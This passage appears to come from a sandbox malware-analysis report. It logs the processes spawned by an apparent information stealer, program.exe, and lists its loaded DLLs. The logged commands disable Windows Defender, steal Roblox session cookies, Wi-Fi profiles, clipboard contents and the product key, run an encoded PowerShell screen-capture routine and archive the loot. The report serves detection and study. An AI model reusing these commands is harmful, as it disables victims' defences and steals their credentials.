              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcg
BlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbg
AoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\program.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: python3.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: libffi-8.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: sqlite3.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: libcrypto-3.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: libssl-3.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: avicap32.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: msvfw32.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: dciman32.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: mmdevapi.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: devobj.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: ksuser.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: avrt.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: audioses.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: powrprof.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: umpdc.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: msacm32.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: midimap.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\program.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
